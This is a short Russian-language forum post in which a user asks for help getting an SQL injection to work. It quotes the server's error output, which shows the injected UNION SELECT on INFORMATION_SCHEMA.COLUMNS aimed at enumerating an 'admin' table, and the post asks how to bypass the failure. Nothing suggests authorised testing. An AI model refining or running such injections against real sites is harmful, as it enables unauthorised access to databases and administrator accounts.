13.12.2012, 22:22
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649
Репутация:
97
|
|
Товарищи, прошу помощи с SQL injection.
Сервер отвечает так:
Сообщение от None
Invalid query
SELECT r.name FROM role as r INNER JOIN admin as a ON (a.role_id = r.role_id) WHERE a.nik='
' UNION (SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=`admin` LIMIT 0,1) --
'
1054: Unknown column 'admin' in 'where clause'
Цветом выделена моя инъекция.
Я так понимаю, он не может найти таблицу `admin` потому что мой запрос попал в INNER JOIN, верно?
Как можно обойти? |
|
|